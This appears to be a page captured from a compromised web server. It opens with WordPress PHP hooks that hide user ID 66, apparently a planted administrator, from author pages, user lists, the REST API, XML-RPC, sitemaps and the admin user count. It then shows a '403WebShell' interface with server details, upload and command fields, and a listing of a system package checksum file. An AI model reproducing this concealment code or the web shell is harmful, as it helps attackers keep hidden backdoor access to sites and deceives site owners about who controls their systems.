add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/mdadm.md5sums
08cdebd779e7caa035101367381f6d38  lib/systemd/system-shutdown/mdadm.shutdown
f1bbad271632bc3ea09da3ab8955c322  lib/systemd/system/mdadm-grow-continue@.service
737d0cae03f45eb6e51ecc6940411609  lib/systemd/system/mdadm-last-resort@.service
776ac6e716328770796c44295da3f999  lib/systemd/system/mdadm-last-resort@.timer
047b7957930cf65cea81677ba72a0362  lib/systemd/system/mdcheck_continue.service
08a0b5c112d73e5e9611fd3d8002a760  lib/systemd/system/mdcheck_continue.timer
233fb98623c65b954ce19d6e8db6e7e2  lib/systemd/system/mdcheck_start.service
c7c6dd35dbcc0fba3bc79b46b5f3505a  lib/systemd/system/mdcheck_start.timer
3c5fb0c6babd145b5ab47f84f02f619c  lib/systemd/system/mdmon@.service
b2bb438b51db477d34ffb31a393b53e2  lib/systemd/system/mdmonitor-oneshot.service
a467f2696535dd0cadb47ffae2dcca1a  lib/systemd/system/mdmonitor-oneshot.timer
5035bfd31af47ff96c7cc30875ddb712  lib/systemd/system/mdmonitor.service
9d7dfcdc58fa54941f8d28f6094a7a5b  lib/udev/rules.d/01-md-raid-creating.rules
36a4851143a2c3e426c3f6b569ae6e73  lib/udev/rules.d/63-md-raid-arrays.rules
c326832543a521f671acff86377c43b7  lib/udev/rules.d/64-md-raid-assembly.rules
ba1d376ca9b7364576f950d06ba18207  lib/udev/rules.d/69-md-clustered-confirm-device.rules
d8419faf2c93388717877eadc9039135  sbin/mdadm
dc961326aacf2e50bdac891576a7ad81  sbin/mdmon
f96d3a6ff0c218572d6b92f0d4b7bfdc  usr/share/apport/package-hooks/source_mdadm.py
35fff0396c08e3141b7dd8024235e004  usr/share/bug/mdadm/script
6cea90667519fa0efadcd8bd605fcbdc  usr/share/doc/mdadm/FAQ.gz
8d1b7dcb3d65d7d1cb1b806d20cc3a18  usr/share/doc/mdadm/README.checkarray
62e429a7d39b9f41e12c5a3973eb9b9d  usr/share/doc/mdadm/README.recipes.gz
234fb6ed1e3316e0fbe63e8da59dbb0c  usr/share/doc/mdadm/TODO.Debian
63e129c9f8ddba50e189fee09c4926cc  usr/share/doc/mdadm/TODO.gz
0566648690bd213b8ab9ed7c7aa19302  usr/share/doc/mdadm/changelog.Debian.gz
57bb4da9b401bfe99ee530034953bfde  usr/share/doc/mdadm/copyright
124bd52b93aabee94b81775663b0220c  usr/share/doc/mdadm/examples/mdadm.conf-example
78f8f07fe6fd87ba6436de83070b4d96  usr/share/doc/mdadm/examples/syslog-events
1263521b59be8567c9d99a7b3d008798  usr/share/doc/mdadm/external-reshape-design.txt.gz
ec34bcacdacd91cd76b621b706134255  usr/share/doc/mdadm/mdmon-design.txt.gz
41797798f5eb4fb8a4f815053467b168  usr/share/finalrd/mdadm.finalrd
fb1e829f1a4290d4fdb9b0091d1020b5  usr/share/initramfs-tools/hooks/mdadm
65301b43213a0b1dcff52b3fb9a0e1bb  usr/share/initramfs-tools/scripts/init-top/00_mount_efivarfs
f3b648ca1c912da30940f0b821b7e9e6  usr/share/initramfs-tools/scripts/local-block/mdadm
192ccafcfe38eabf0f5184786764c4a9  usr/share/initramfs-tools/scripts/local-bottom/mdadm
43be38057027e0206d4bb71f9db7a720  usr/share/lintian/overrides/mdadm
024dd948a4dedf128e16574a1ab1fbc1  usr/share/man/man4/md.4.gz
dbd1d5a86d73b90d684802176cc9edd6  usr/share/man/man5/mdadm.conf.5.gz
b8bba3ff7af9146346dbf3f6be54943e  usr/share/man/man8/mdadm.8.gz
a2b7a0e74b2f071550ede701cd1e3055  usr/share/man/man8/mdmon.8.gz
04c3f85c12d6b795e37d69ecd9635aeb  usr/share/mdadm/checkarray
b317fb36811148c2b40d12651b45d01e  usr/share/mdadm/mdcheck
21400a5a7357d06152ef6d606c3d3cc6  usr/share/mdadm/mkconf

Youez - 2016 - github.com/yon3zu
LinuXploit